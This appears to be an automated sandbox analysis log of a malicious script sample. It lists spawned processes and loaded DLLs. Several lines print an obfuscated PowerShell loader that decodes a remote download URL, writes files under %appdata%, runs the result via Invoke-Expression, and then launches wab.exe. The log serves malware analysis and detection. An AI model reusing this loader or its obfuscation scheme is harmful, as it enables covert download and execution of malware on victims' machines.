              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelArts oDobb b D,oma K ynlBebyg:Be,tiPRevokr orsoTidsivMillii ,rdis SolaiTheopoRefern Promm B dleB strnAlte t ,akk=A del(grif cHexamm stild .egu Fedt/Affalc Indb Ska.e$CirkuSBal,lt TrigrroquemHjsp pSkimpe etalhSukkeo O.aclbeviddGlibnevan.urPreexeTidv.nSkrivsovers)Ricci ');Handelsmssiges (Tilsynsraads 'Optrd$skullg GruplstyrtoTrigobTriu,aArti,lStron:SkorzSPotbah .araaMonetdAlthio PlanwWidgi=Grnse$ S,inOKantav ,rane ,opcrBattamTipvou S.necRunouhA sol.Ou wrsSemicpDisa l BudsiChorttSemij(Succo$ atlaO.kytssFoodlcTuxedhS.ciaeOlavuo MumllAf.oliB,holtBaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Briarberry.Mil && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
